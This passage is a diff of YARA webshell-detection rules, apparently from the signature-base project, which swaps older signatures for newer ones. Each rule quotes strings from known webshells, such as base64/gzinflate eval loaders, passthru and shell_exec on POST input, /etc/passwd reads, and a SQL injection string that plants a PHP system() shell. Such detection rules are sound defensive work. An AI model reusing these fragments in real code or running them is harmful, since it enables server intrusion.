 	strings:
-		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
-		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
-		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
+		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
+		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_PHP_Shell_Php_Php
+rule SIGNATURE_BASE_Webshell_B374K_Mini_Shell_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6978126c-5414-52d2-b085-6e5589716d93"
+		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5b0dfa5-46b5-5323-a8e8-b119d8c2c8e5"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4552-L4563"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5693-L5706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
-		logic_hash = "2d5b6e08bfe9e1551dab12b01189dadc924c097427c996684bab96c48d528395"
+		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
+		logic_hash = "553bd775d9662f9410d9ab946ccffe4b2ee92e367bcc6345fa595527653280cf"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
-		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+		$s0 = "@error_reporting(0);" fullword
+		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+		$s3 = "@set_time_limit(0); " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz_Html
+rule SIGNATURE_BASE_Webshell_Sincap_1_0
 {
 	meta:
-		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d50a8669-fd28-59d2-9f00-f4fe2b85dc22"
+		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "38d39739-660f-596d-a297-1f0dfe530797"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4564-L4577"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5707-L5722"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
-		logic_hash = "9e2d56b49df65a2c13e15f97ec91cdbb6852d86e86f921d7c8a4db82cbea12f5"
+		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
+		logic_hash = "0cb8851285bd55b0b613ec4c46ab88142e2cbba7e527ad510b008cfb342af221"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Ayyildiz"
-		$s1 = "TouCh By iJOo"
-		$s2 = "First we check if there has been asked for a working directory"
-		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
+		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
+		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_EFSO_2_Asp
+rule SIGNATURE_BASE_Webshell_B374K_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "f0566790-b41c-5167-b7ec-19e7d04256d1"
+		description = "PHP Webshells Github Archive - file b374k.php.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "73eb7d8d-14bb-5bc2-90b2-90b6bd603bd1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4578-L4589"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5723-L5738"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
-		logic_hash = "15e5419854bcbb08f28fff1e266cca7a004f01ec0a5c313c107ec17c3aa7ffee"
+		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
+		logic_hash = "f44ecdcf327cf417a90a91c8d23f6137b80c2006bea2ca2e214f2bfdf5793771"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Ejder was HERE"
-		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
+		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+		$s6 = "// password (default is: b374k)"
+		$s8 = "//******************************************************************************"
+		$s9 = "// b374k 2.2" fullword
+		$s10 = "eval(\"?>\".gzinflate(base64_decode("
 
 	condition:
-		2 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Lamashell_Php
+rule SIGNATURE_BASE_Webshell_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend
 {
 	meta:
-		description = "Semi-Auto-generated  - file lamashell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cbbb3377-ef9c-5fd1-a8b8-2b730fb5ef28"
+		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3e0bae7d-77a1-5439-bbe7-177bec23cea0"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4590-L4602"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5739-L5756"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "de9abc2e38420cad729648e93dfc6687"
-		logic_hash = "5e156c3057338fa7b306b91dd979851dd56b8b698cfe99e1d7b6d096a4c580e7"
+		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
+		logic_hash = "63ebb0c673a5aee05d2d9d571ebf63942d826b5148a5f7ed587ba1efbb0dc923"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "lama's'hell" fullword
-		$s1 = "if($_POST['king'] == \"\") {"
-		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
+		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
+		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
+		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s19 = "$Comments=$_POST['Comments'];" fullword
+		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Ajax_PHP_Command_Shell_Php
+rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_2 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cae2e035-ae7b-589b-b2d9-e709028274c5"
+		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		id = "252ecc2c-83e3-5ca5-a86a-caf76e63e79c"
+		date = "2014-04-06"
+		modified = "2025-03-21"
+		old_rule_name = "WebShell_h4ntu_shell__powered_by_tsoi_"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5758-L5773"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
+		logic_hash = "c731f2f430e61277ec6c8e292aa50a31eea46fe67eb455811b3fbe9e8967a8c1"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+		$s2 = "$uname = posix_uname( );" fullword
+		$s3 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+		$s4 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+
+	condition:
+		filesize < 2MB and 2 of them
+}
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell
+{
+	meta:
+		description = "PHP Webshells Github Archive - file MyShell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4603-L4615"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5775-L5793"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "93d1a2e13a3368a2472043bd6331afe9"
-		logic_hash = "37cba26018f3d37194a143871012a61a7bcee6775d2cf5f93a52b779010d3260"
+		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
+		logic_hash = "2c39ffecb44ce2f936ba3563c6086d8b2ed75aec3b57b45e2a1f5e7321ac9a3f"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
-		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
-		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
+		$s3 = "<title>MyShell error - Access Denied</title>" fullword
+		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+		$s19 = "#every command you excecute." fullword
+		$s20 = "<form name=\"shell\" method=\"post\">" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Jspwebshell_1_2_Jsp
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Pws
 {
 	meta:
-		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "edfe6a3d-7d56-52ad-a376-cec5722e87b7"
+		description = "PHP Webshells Github Archive - file pws.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4616-L4629"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5794-L5810"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "70a0ee2624e5bbe5525ccadc467519f6"
-		logic_hash = "32b3ddb00f89a3540118fe8ce5fc070556b00030dcf2b21245d38ae66e6cbc14"
+		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
+		logic_hash = "4b2eeb80200cc5dffa80cddc74f1902c0e8a5d2313d9a20d02eeb99ccb668ec0"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "JspWebshell"
-		$s1 = "CreateAndDeleteFolder is error:"
-		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
-		$s3 = "String _password =\"111\";"
+		$s6 = "if ($_POST['cmd']){" fullword
+		$s7 = "$cmd = $_POST['cmd'];" fullword
+		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
+		$s11 = "if (file_exists($uploaded)) {" fullword
+		$s12 = "copy($uploaded, $dez);" fullword
+		$s17 = "passthru($cmd);" fullword
 
 	condition:
-		2 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Sincap_Php_Php
+rule SIGNATURE_BASE_Webshell_Reader_Asp_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "8c4dc7b1-94ce-5528-8442-eae05d2c9980"
+		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "80ec18e1-6f41-5188-b2d5-f4228c975fa1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4630-L4642"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5811-L5825"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b68b90ff6012a103e57d141ed38a7ee9"
-		logic_hash = "e708a7dcb26ff7d0208c1f092e14e701f2ae94c4ffca019f13064bbe04ef74d7"
+		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
+		logic_hash = "6ffda38584b6cdec818af8e09c62bb4a46f40230ffd5c1a68993a91c37f67680"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
-		$s2 = "$tampon4=$tampon3-1"
-		$s3 = "@aventgrup.net"
+		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
+		$s12 = " HACKING " fullword
+		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
+		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
 
 	condition:
-		2 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Test_Php_Php
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_3
 {
 	meta:
-		description = "Semi-Auto-generated  - file Test.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "58d73264-6507-5560-ad3e-0cc86c2ee291"
+		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "349cf6ac-92b3-59f7-a6e4-c23e69b454c6"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4643-L4655"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5826-L5843"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "77e331abd03b6915c6c6c7fe999fcb50"
-		logic_hash = "575a2eeadc8113d779057f98e978ed4f8914546117b57944bf65f1d6d84c9521"
-		score = 50
+		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
+		logic_hash = "6840af0d9f99277277edce93deb54e9a319c8938169701c89fdeb65207590951"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
-		$s2 = "fwrite ($fp, \"$yazi\");" fullword
-		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
+		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
+		$s15 = "if(empty($_GET['file'])){" fullword
+		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Phyton_Shell_Py
+rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "2f55d60d-94f3-508d-a2d0-5ab59e3fdab3"
+		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b647f529-be81-51ad-b671-84aec410e133"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4656-L4669"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5844-L5860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "92b3c897090867c65cc169ab037a0f55"
-		logic_hash = "ac16a95cd1fb09c93b315e3cd7d57c1ebec322b641f515854fb73a61393dd365"
+		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
+		logic_hash = "92bfac3516a448bbb3e78cf8950c6e816bf35d0ae2f3d32bc9b9b2836309999b"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
-		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
-		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
-		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
+		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
+		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
+		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
+		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Mysql_Tool_Php_Php
+rule SIGNATURE_BASE_Webshell_PHP_Backdoor_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "c67197d1-6e40-5bf2-9e1b-6ada43529435"
+		description = "PHP Webshells Github Archive - file php-backdoor.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65e1305b-4fc7-5885-b3df-92846bb57fe3"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_php_backdoor"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4670-L4682"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5861-L5877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
-		logic_hash = "9f49bd6c56c919f678ecada82ff3d801c82c98a8abdee85cda1ec7e5b6756012"
+		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
+		logic_hash = "4228bcbfff5d7756615347196270f7916843e2aceacc7298610070b8b923381b"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
-		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
-		$s4 = "<div align=\"center\">The backup process has now started<br "
+		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
+		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
+		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
+		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
+		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Zehir_4_Asp
+rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ea7df4e1-d4e2-5a58-a014-d12cb9afaf79"
+		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "04ed7464-29d1-54b9-98ff-afc03475b220"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_Worse_Linux_Shell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4683-L4694"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5878-L5895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7f4e12e159360743ec016273c3b9108c"
-		logic_hash = "69063d866daf1709df81fa22d76177bf8d552e19725a94db4a1b2fca79387faf"
+		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
+		logic_hash = "6480c524213583511253ea1d37820994bba8a86f58a3775d4a9e4325725289d8"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
-		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
+		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
+		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
+		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
+		$s8 = "$currentCMD = \"ls -la\";" fullword
+		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
+		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Sh_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Phpinj
 {
 	meta:
-		description = "Semi-Auto-generated  - file sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
+		description = "PHP Webshells Github Archive - file pHpINJ.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4695-L4706"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5896-L5913"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "330af9337ae51d0bac175ba7076d6299"
-		logic_hash = "b0c3307d451e5d7dadece114e2888503a46038e2edb2ff32bf566ce47b300e76"
+		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
+		logic_hash = "271efaa8f370376f971d3d59256658b341599ac554cc216e09401e44b16bdede"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
-		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
+		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
+		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
+		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Phpbackdoor15_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_NGH
 {
 	meta:
-		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "a93b881b-3050-5f43-803c-4a571aaaef82"
+		description = "PHP Webshells Github Archive - file NGH.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4707-L4719"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5914-L5931"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
